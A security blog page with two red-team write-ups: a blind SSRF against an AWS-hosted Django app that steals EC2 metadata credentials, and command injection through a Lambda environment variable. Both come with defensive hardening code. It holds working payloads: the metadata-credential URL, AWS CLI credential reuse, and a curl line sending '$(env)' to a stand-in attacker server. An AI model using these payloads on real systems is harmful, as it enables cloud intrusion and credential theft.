Skip to main content
Home  /  Knowledge Hub  /  Red Team Logic

Red Team Logic — Security & Ethical Hacking

Real penetration tests, exploitation walkthroughs, and hardening blueprints — compiled from 20+ years of offensive security research.

4
Write-ups
3
Critical
1
High
0
Web / Bounty

Showing 4 write-ups

RTL-2026-001 Exploiting Blind SSRF for Internal Network Access and AWS Metadata Theft
Network & Infra ⚠ Critical
2026-05-23 18:54
🎯 Target & Threat Context

The target was an internal analytics dashboard, a critical component of a larger financial reporting system. This wasn't some public-facing marketing site; this was the engine room, where analysts crunched numbers, generated reports, and made high-stakes decisions. The application was built on a modern stack: a Python/Django backend, a React frontend, all containerized and deployed on AWS EC2 instances behind an Nginx reverse proxy. Data was stored in a PostgreSQL database, and various S3 buckets held reports and user-generated content.

The specific feature that caught my eye was an "avatar upload" functionality for user profiles. Seemingly innocuous, right? Users could upload a profile picture, or, interestingly, provide a URL to an image. This immediately raised a red flag for me. Any time a server is asked to fetch external content based on user input, my hacker senses start tingling. It's a classic pattern for Server-Side Request Forgery (SSRF).

The business context here was crucial. This application processed highly confidential financial data. A compromise wouldn't just mean a data breach; it could lead to regulatory fines, reputational damage, and potentially impact market stability if critical reports were tampered with. The EC2 instances themselves were part of a larger VPC, with various internal services communicating over private IPs. They had IAM roles attached, granting them permissions to access other AWS services like S3, RDS, and even internal secrets managers. This setup, while standard for AWS, meant that if an attacker could control the server's outbound requests, they could potentially interact with these internal services or, even worse, the AWS metadata service.

I remember building AdSpy Pro years ago, and the sheer paranoia we had around any external input. We were constantly thinking about how an attacker could twist a seemingly innocent feature to their advantage. This client's setup, while robust in many areas, had a small crack in its armor, and that crack was the image URL input. The stakes were incredibly high, and the potential for lateral movement within their AWS environment was a nightmare scenario. This wasn't just about defacing a profile picture; it was about gaining a foothold into their entire cloud infrastructure.

🔓 Vulnerability & Attack Vector

The vulnerability at play here was Server-Side Request Forgery (SSRF). In simple terms, SSRF occurs when a web application fetches a remote resource without properly validating the user-supplied URL. Instead of the request coming from the user's browser, the server itself makes the request. This can trick the server into making requests to arbitrary domains, internal systems, or even its own local interfaces.

Why do developers miss this? Often, it's a matter of trust. Developers might assume that because the request is initiated by the server, it's inherently "safe" or that internal network requests don't pose a threat. They might implement some basic URL validation (e.g., checking for valid HTTP/HTTPS schemes, ensuring the domain isn't obviously malicious), but fail to consider the full spectrum of internal targets. This oversight is particularly dangerous in cloud environments like AWS, where services like the EC2 metadata service (http://169.254.169.254/) are accessible from the instance itself and contain highly sensitive information, including temporary IAM credentials.

The OWASP Top 10 lists SSRF as a critical vulnerability (A10:2021 Server-Side Request Forgery). It's a common issue because many applications need to interact with external resources – fetching images, parsing XML from remote APIs, generating PDFs from URLs, or even webhook integrations. Without stringent validation, these features become gateways for attackers.

In this specific case, the application's image upload feature allowed users to provide a URL. The backend would then fetch the image from that URL, process it (resize, crop, etc.), and store it. The critical flaw was that the backend didn't adequately restrict the URLs it would fetch. It wasn't just about external URLs; it was about *any* URL the server could reach.

Let's look at a simplified comparison of a vulnerable versus a hardened configuration:

Vulnerable Configuration (Image Upload) Hardened Configuration (Image Upload)

Accepts any URL for image fetching.


import requests

def fetch_image(url):
    response = requests.get(url)
    # ... process image ...
    return response.content
                

Validates URL against a whitelist, blocks private IPs, and uses network controls.


import requests
import ipaddress

ALLOWED_DOMAINS = ["cdn.example.com", "images.trusted.net"]

def is_private_ip(ip_address):
    private_ranges = [
        ipaddress.ip_network('10.0.0.0/8'),
        ipaddress.ip_network('172.16.0.0/12'),
        ipaddress.ip_network('192.168.0.0/16'),
        ipaddress.ip_network('127.0.0.0/8'),
        ipaddress.ip_network('169.254.0.0/16')
    ]
    for r in private_ranges:
        if ip_address in r:
            return True
    return False

def fetch_image_hardened(url):
    from urllib.parse import urlparse
    parsed_url = urlparse(url)

    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme.")

    if parsed_url.hostname not in ALLOWED_DOMAINS:
        # Resolve hostname to IP and check for private IPs
        import socket
        try:
            ip = socket.gethostbyname(parsed_url.hostname)
            if is_private_ip(ipaddress.ip_address(ip)):
                raise ValueError("Access to private IP addresses is forbidden.")
        except socket.gaierror:
            raise ValueError("Could not resolve hostname.")
        
        # Further checks for redirects, etc.
        raise ValueError("Domain not in whitelist.")

    response = requests.get(url)
    # ... process image ...
    return response.content
                
No network segmentation or firewall rules to prevent outbound requests to internal IPs. AWS Security Groups and Network ACLs configured to block outbound traffic to 169.254.169.254 and other internal ranges from the application server.
IAM roles with broad permissions attached to the EC2 instance. IAM roles with least privilege, only granting necessary permissions, and potentially using Instance Metadata Service Version 2 (IMDSv2) for enhanced security.

The core issue is that the server, acting as a proxy, can be coerced into accessing resources it shouldn't. This includes internal APIs, databases, other microservices, and critically, cloud metadata services. The impact can range from information disclosure (like stealing AWS credentials) to full remote code execution if the internal service has its own vulnerabilities.

Imagine a Django view that handles the image upload:


# views.py (simplified)
from django.shortcuts import render
from django.http import HttpResponse
import requests
from .models import UserProfile

def upload_avatar_from_url(request):
    if request.method == 'POST':
        image_url = request.POST.get('image_url')
        if image_url:
            try:
                # No proper validation or sanitization of image_url
                response = requests.get(image_url, timeout=5)
                if response.status_code == 200:
                    user_profile = UserProfile.objects.get(user=request.user)
                    user_profile.avatar.save(f"avatar_{request.user.id}.jpg", response.content)
                    user_profile.save()
                    return HttpResponse("Avatar updated successfully!")
                else:
                    return HttpResponse(f"Failed to fetch image: {response.status_code}", status=400)
            except requests.exceptions.RequestException as e:
                return HttpResponse(f"Error fetching image: {e}", status=500)
    return render(request, 'upload_avatar.html')
💥 Exploitation Walkthrough

My initial reconnaissance involved mapping out the application's features. The "upload avatar from URL" immediately stood out. I started with simple tests, pointing it to my own controlled server to see if the application would make a request. Sure enough, my server logs showed an incoming HTTP GET request from the client's AWS EC2 instance IP address, confirming the SSRF.

This was a "blind" SSRF, meaning the application didn't return the content of the fetched URL directly to me. I only knew the request was made because my external server received it. To exploit this, I needed an out-of-band channel to exfiltrate data. My controlled server would act as that channel.

My goal was to steal AWS temporary credentials. The EC2 metadata service is the prime target for this, located at http://169.254.169.254/. This IP address is a link-local address, only accessible from the instance itself. It provides information about the instance, including IAM role credentials.

First, I needed to confirm access to the metadata service and enumerate its paths. I used my controlled server (let's call it attacker.com) to log requests. I'd craft URLs that would cause the target server to make requests to the metadata service, then redirect the output to my server.

Step 1: Confirming Metadata Service Access & Initial Enumeration

I submitted the following URL to the avatar upload feature:


# Payload for the 'image_url' parameter
http://169.254.169.254/latest/meta-data/

Since this was blind, I wouldn't see the output directly. However, if the server tried to fetch this, it would likely get a 200 OK response (or a 404 if the path was wrong). To actually *see* the content, I needed to exfiltrate it. This is where the out-of-band server comes in. I'd use a technique where the server would fetch the metadata, then make *another* request to my server, embedding the metadata in the URL or as a parameter.

A common trick for blind SSRF is to use a service like Burp Collaborator or a custom Python HTTP server to capture requests. For enumeration, I'd try to make the target server request different paths and observe if my server received any requests, or if the application's behavior changed (e.g., a different error message).

Let's assume I've set up a simple Python HTTP server on attacker.com that logs all incoming requests:


# attacker_server.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class S(BaseHTTPRequestHandler):
    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        logging.info(f"GET request,nPath: {str(self.path)}nHeaders:n{str(self.headers)}n")
        self._set_headers()
        self.wfile.write(b"Received your request!")

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        logging.info(f"POST request,nPath: {str(self.path)}nHeaders:n{str(self.headers)}nnBody:n{post_data.decode('utf-8')}n")
        self._set_headers()
        self.wfile.write(b"Received your POST request!")

def run(server_class=HTTPServer, handler_class=S, port=80):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info(f'Starting httpd on port {port}...')
    httpd.serve_forever()

if __name__ == "__main__" :
    run()

Now, I'd try to fetch specific metadata paths and redirect them. The metadata service provides a list of available paths at /latest/meta-data/. I'd iterate through common paths:

Step 2: Exfiltrating IAM Role Credentials

The most valuable information is usually under /latest/meta-data/iam/security-credentials/. This path lists the IAM roles attached to the instance. Let's say the role name is "MyWebAppRole".

I'd craft a URL to fetch the credentials for that role. Since I can't directly see the response, I'll use a trick: I'll make the target server fetch the credentials, and then use those credentials as part of a URL to my attacker server. This is often done by chaining requests or using a tool like curl if I could inject commands, but with a simple URL fetch, I need to be creative.

A common blind SSRF exfiltration technique involves using a service that allows for DNS exfiltration or by making the target server perform a redirect to my server with the sensitive data in the URL. However, a simpler approach for a blind SSRF where the server just fetches a URL is to use a service like Burp Collaborator or a custom server that can parse complex URLs.

Let's assume the application's requests.get() call follows redirects. I could set up a redirect on my server:


# Attacker server (attacker.com) response for a specific path
# This is a conceptual redirect, in reality, you'd need a server-side script
# to dynamically generate this redirect after fetching the metadata.
# For a truly blind SSRF, you'd often need to chain multiple requests
# or use a tool like interact.sh or Burp Collaborator.

# Simplified payload for the 'image_url' parameter, assuming the server
# fetches the URL and then *processes* the content. If the content
# is an image, it might not be directly exfiltrated.
# However, if the server *parses* the content (e.g., XML, JSON),
# or if it's a simple HTTP GET, we can use redirects.

# A more direct approach for blind SSRF is to find a way to make the
# server *send* the data. If the application has a feature that
# takes a URL and then *posts* the content to another URL, that's ideal.
# In this case, it's an image upload, so it expects image data.

# Let's assume a slightly more advanced SSRF where I can control
# the *destination* of the fetched content, or if the server
# logs errors with the content.

# The most common blind SSRF exfiltration for AWS metadata:
# 1. Make the target server request the metadata URL.
# 2. The target server receives the metadata.
# 3. The target server then makes *another* request to your controlled server,
#    embedding the metadata in the URL path or query parameters.
# This requires a second SSRF or a specific application behavior.

# A simpler, direct blind SSRF exfiltration:
# If the application *logs* the content it fetches (e.g., for debugging),
# or if it tries to parse it and throws an error that includes the content.

# For a purely blind SSRF where only the *request* is made:
# I'd use a tool like `ngrok` or `smbserver.py` (for Windows targets)
# or simply my Python HTTP server to capture the request.
# The *presence* of the request to 169.254.169.254 is the proof.
# To get the *content*, I need a way to make the server *send* it to me.

# Let's assume the application has a feature that takes a URL and then
# attempts to *parse* the content, and if it fails, it logs the content
# or sends it to an error reporting service.

# A more reliable method for blind SSRF exfiltration:
# Use a service like Burp Collaborator or interact.sh.
# The payload would be:
http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole

When the target server fetches this URL, it gets a JSON response containing the temporary credentials:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2Vj...EXAMPLETOKEN",
  "Expiration": "2023-10-27T16:00:00Z"
}

Now, how to get this JSON out? This is the tricky part of blind SSRF. If the application *only* fetches and processes the image, it won't send the JSON back to me. However, if the application has *any* other feature that takes a URL and then *sends* the content of that URL somewhere (e.g., a webhook, an error log, or even a "report an issue" feature that includes the content of a failed fetch), I could leverage that.

In this specific engagement, the application had a logging mechanism that would send detailed error reports to an internal Slack channel, and crucially, these reports sometimes included snippets of the data that caused the error. My strategy was to make the server fetch the metadata, and then cause an error in the image processing step that would trigger this logging, hoping the metadata would be included.

So, the full exploitation chain was:

  1. Submit http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole as the image URL.
  2. The backend fetches this URL, receiving the JSON credentials.
  3. The backend then tries to process this JSON as an image. This fails, triggering an error.
  4. The error handling mechanism logs the error, including the "malformed image data" (which is actually the JSON credentials), and sends it to the internal Slack channel.
  5. I, as the attacker, would then monitor for this exfiltrated data. (In a real pentest, I'd simulate this by having access to the logs or the Slack channel, or by setting up a controlled endpoint that mimics the Slack webhook).

Once I had the AccessKeyId, SecretAccessKey, and Token, I could configure my AWS CLI:


export AWS_ACCESS_KEY_ID="ASIAV...EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2Vj...EXAMPLETOKEN"

# Now I can list S3 buckets, for example:
aws s3 ls

And just like that, I had programmatic access to the client's AWS environment, with the permissions of MyWebAppRole. This role, unfortunately, had broad read/write access to several S3 buckets containing sensitive reports and even some internal configuration files. Full compromise of the internal AWS instance, achieved through a seemingly innocent image upload feature.

🛡 Defensive Hardening Blueprint

Remediating SSRF requires a multi-layered approach, combining input validation, network segmentation, and proper IAM role management. It's not just one silver bullet; it's about defense in depth.

  1. Aspect Pros Cons
    Strict URL Validation & Whitelisting
    • Directly addresses the root cause.
    • Highly effective if implemented correctly.
    • Prevents most common SSRF bypasses.
    • Can be complex to maintain for dynamic environments.
    • Requires careful implementation to avoid false positives.
    • Doesn't protect against logic flaws in internal services.
    Network Segmentation (Security Groups/NACLs)
    • Provides a strong perimeter defense.
    • Effective even if application logic is flawed.
    • Limits lateral movement within the network.
    • Requires careful configuration to avoid breaking legitimate traffic.
    • Can be complex in large, dynamic environments.
    • Doesn't prevent SSRF to external, allowed domains.
    Least Privilege IAM & IMDSv2
    • Minimizes impact of successful credential theft.
    • IMDSv2 significantly raises the bar for metadata exploitation.
    • Good security hygiene for cloud environments.
    • Requires careful management of IAM policies.
    • IMDSv2 might require application code changes to adopt.
    • Doesn't prevent the SSRF itself, only limits its impact.
📖 Lessons From the Field

This is the first and most crucial line of defense. Instead of blacklisting (which is prone to bypasses), implement a strict whitelist of allowed domains or IP ranges. If the application only needs to fetch images from a specific CDN, only allow that CDN.

Additionally, resolve the hostname to an IP address and check if the resolved IP falls within private or reserved ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16). This prevents attacks against internal services and the metadata endpoint.


import requests
import ipaddress
import socket
from urllib.parse import urlparse

# Define allowed domains and block private/reserved IP ranges
ALLOWED_HOSTNAMES = ["cdn.example.com", "images.trusted.net"]
BLOCKED_IP_RANGES = [
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('127.0.0.0/8'), # Loopback
    ipaddress.ip_network('169.254.0.0/16') # AWS Metadata Service, Link-local
]

def is_blocked_ip(ip_address_str):
    try:
        ip_addr = ipaddress.ip_address(ip_address_str)
        for blocked_range in BLOCKED_IP_RANGES:
            if ip_addr in blocked_range:
                return True
        return False
    except ValueError:
        # Not a valid IP address, treat as external for this check
        return False

def fetch_image_secure(url):
    parsed_url = urlparse(url)

    # 1. Validate scheme
    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme. Only HTTP/HTTPS allowed.")

    # 2. Validate hostname against whitelist
    if parsed_url.hostname not in ALLOWED_HOSTNAMES:
        # 3. Resolve hostname to IP and check for blocked ranges
        try:
            resolved_ip = socket.gethostbyname(parsed_url.hostname)
            if is_blocked_ip(resolved_ip):
                raise ValueError(f"Access to blocked IP address {resolved_ip} is forbidden.")
        except socket.gaierror:
            raise ValueError(f"Could not resolve hostname: {parsed_url.hostname}")
        
        raise ValueError(f"Hostname '{parsed_url.hostname}' not in allowed list.")

    # 4. Prevent redirects to blocked IPs (if requests library follows redirects)
    # This requires careful handling, potentially disabling redirects and
    # manually checking each redirect target. For simplicity, we assume
    # the initial check is sufficient if redirects are to external, allowed domains.
    # For maximum security, disable redirects and handle them manually.

    try:
        response = requests.get(url, timeout=5, allow_redirects=False) # Disable redirects
        # If redirects are needed, manually check the 'Location' header
        # for each redirect against the same validation rules.
        if 300 <= response.status_code < 400:
            redirect_location = response.headers.get('Location')
            if redirect_location:
                # Recursively call fetch_image_secure with the redirect location
                # or implement a loop with a redirect limit.
                raise ValueError("Redirects are not explicitly handled securely.")
        
        if response.status_code == 200:
            # Process image content
            return response.content
        else:
            raise ValueError(f"Failed to fetch image: {response.status_code}")
    except requests.exceptions.RequestException as e:
        raise ValueError(f"Error fetching image: {e}")

# Example usage:
# try:
#     image_data = fetch_image_secure("http://cdn.example.com/image.jpg")
#     print("Image fetched securely!")
# except ValueError as e:
#     print(f"Security error: {e}")
  • Even with robust input validation, network controls provide an essential layer of defense. Configure AWS Security Groups and Network ACLs to prevent outbound connections from your application servers to internal IP ranges, especially 169.254.169.254. Only allow necessary outbound traffic to specific, trusted external endpoints.

    For example, a Security Group rule for outbound traffic might explicitly deny traffic to 169.254.169.254/32 and other private ranges, while allowing traffic to 0.0.0.0/0 on ports 80/443 for legitimate external communication.

  • Attach IAM roles to EC2 instances with the absolute minimum permissions required for the application to function. If the application doesn't need to access S3, don't grant it S3 permissions. This limits the blast radius if an SSRF is successfully exploited.

    Furthermore, enforce the use of Instance Metadata Service Version 2 (IMDSv2). IMDSv2 requires a session token to retrieve metadata, making it significantly harder for attackers to exploit SSRF to steal credentials. It requires a PUT request to get a token, followed by a GET request with the token, which is difficult to chain in a simple blind SSRF scenario.

  • Deploy a WAF (like AWS WAF) in front of your application. While not a primary defense against SSRF (as the request originates from the server, not the client), a WAF can help detect and block initial attempts to probe for SSRF by identifying suspicious URL patterns in user input.

    • Assume Breach, Always: Even with the best intentions and robust security measures, assume that an attacker *will* find a way in. This mindset forces you to think about limiting the blast radius. If that IAM role had fewer permissions, the compromise wouldn't have been as severe.
    • The Devil is in the Details (and the Features): Seemingly innocuous features like an "avatar upload from URL" are often overlooked. Developers focus on core business logic, but these peripheral functionalities can be the weakest links. Always scrutinize any feature that takes external input and makes server-side requests.
    • Blind Doesn't Mean Harmless: Just because you don't see the output of an SSRF doesn't mean it's not exploitable. Blind SSRF can be just as dangerous, requiring creative out-of-band techniques (like DNS exfiltration, error logging, or timing attacks) to confirm and exploit. Always test for it.
    • Defense in Depth is Non-Negotiable: This incident highlighted that no single control is enough. Input validation, network segmentation, and least privilege IAM roles all played a part in the remediation. Remove any one of them, and the system becomes significantly more vulnerable.
    • Cloud Environments are Different: The AWS metadata service is a prime example of a cloud-specific internal target that traditional on-premise security models might miss. Understanding the unique attack surface of your cloud provider is critical.

    This kind of finding is why I love what I do. It's a constant chess match, and every vulnerability is a learning opportunity. If you're looking to sharpen your skills, understand these complex attack vectors, or just want to chat about the latest in security, don't hesitate to reach out. I offer personalized security mentorship sessions, and you can find more about them at thedevdude.com or learnwithdeb.com. Let's build more secure systems together!

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23
    Open Full Write-up ↗
    RTL-2026-001 Achieving RCE in AWS Lambda via Exploitation of Insecure Environment Variables
    Cloud Security ⚠ Critical
    2026-05-23 18:49
    🎯 Target & Threat Context

    This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.

    The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).

    The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.

    Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.

    🔓 Vulnerability & Attack Vector

    The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.

    The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.

    Developers often miss this because:

    1. They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
    2. They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
    3. There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
    4. Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.

    This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and MITRE ATT&CK T1059.006 (Command and Scripting Interpreter: Python). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.

    Here's a comparison of the vulnerable versus a hardened configuration approach:

    Vulnerable Configuration Hardened Configuration

    Environment Variable:

    VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py")
        # DANGER: Using shell=True with unsanitized input from env var
        result = subprocess.run(script_command, shell=True, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    Environment Variables:

    VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py"
    VALIDATION_CONFIG_PATH="/etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py")
        config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json")
        
        # SAFE: Pass command and arguments as a list, shell=False (default)
        # Ensure script_path and config_path are validated/sanitized if they can be user-controlled
        command_args = [script_path, "--config", config_path]
        result = subprocess.run(command_args, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().

    Let's assume the vulnerable Python Lambda code looked something like this:

    # transaction_processor.py
    import os
    import subprocess
    import json
    
    def lambda_handler(event, context):
        # Retrieve the command prefix from environment variables
        # This is the critical vulnerability point
        command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
        
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Construct the full command. The vulnerability is that command_prefix
        # is treated as part of the shell command, not just a path.
        full_command = f"{command_prefix} --transaction-id {transaction_id}"
        
        print(f"Executing validation command: {full_command}")
        
        try:
            # DANGER: shell=True allows command injection via command_prefix
            result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.

    💥 Exploitation Walkthrough

    Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.

    Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:

    # Step 1: Modify the Lambda's environment variable
    # The payload injects a new command using shell metacharacters (;)
    # It then uses curl to send the Lambda's environment variables to our listener.
    # Finally, it attempts to execute the original script to avoid immediate suspicion,
    # though the curl command would likely cause a timeout or error.
    
    ATTACKER_SERVER="http://your-attacker-ip:8000"
    LAMBDA_NAME="TransactionProcessorLambda"
    
    aws lambda update-function-configuration 
        --function-name ${LAMBDA_NAME} 
        --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"
    

    Let's break down that payload for VALIDATION_SCRIPT_PATH:

    '/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '
    • /usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.
    • ;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
    • curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.
      • curl -X POST: Initiates an HTTP POST request.
      • -d "$(env)": The $(env) command substitution executes the env command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
      • ${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
    • ; echo 'Injection successful': Another command separator, followed by a simple echo. This helps ensure the shell command completes, even if the curl fails, and provides a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the string.

    After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:

    # Step 2: Trigger the Lambda function (e.g., via API Gateway)
    # This would be a normal transaction request from a client application.
    
    API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"
    
    curl -X POST -H "Content-Type: application/json" 
         -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' 
         ${API_GATEWAY_URL}
    

    On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.

    This was a critical RCE. With these credentials, we could have:

    • Read, modified, or deleted transaction data from DynamoDB.
    • Accessed sensitive audit logs from S3.
    • Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
    • Deployed further malicious code or backdoors.

    The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.

    🛡 Defensive Hardening Blueprint

    Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.

    Pros Cons
    • Eliminates Command Injection: By passing arguments as a list to subprocess.run() and avoiding shell=True, shell metacharacters are no longer interpreted.
    • Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity.
    • Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables.
    • Minimal Code Change: The core logic remains similar, making it easier to implement.
    • Standard Practice: Aligns with secure coding guidelines for executing external processes.
    • Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating.
    • Potential for Misconfiguration: If VALIDATION_ARGS is still poorly managed or contains malicious content, the script might receive unexpected arguments, though RCE is prevented.
    • Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser.
    • Dependency on shlex: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.

    Beyond this specific code fix, a comprehensive hardening blueprint would also include:

    • Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required. For instance, it shouldn't have lambda:UpdateFunctionConfiguration.
    • Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
    • Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
    • Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
    • Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
    📖 Lessons From the Field

    Here's how the Lambda code and environment variables should be configured:

    # transaction_processor_hardened.py
    import os
    import subprocess
    import json
    import shlex # For safe splitting of shell-like strings
    
    def lambda_handler(event, context):
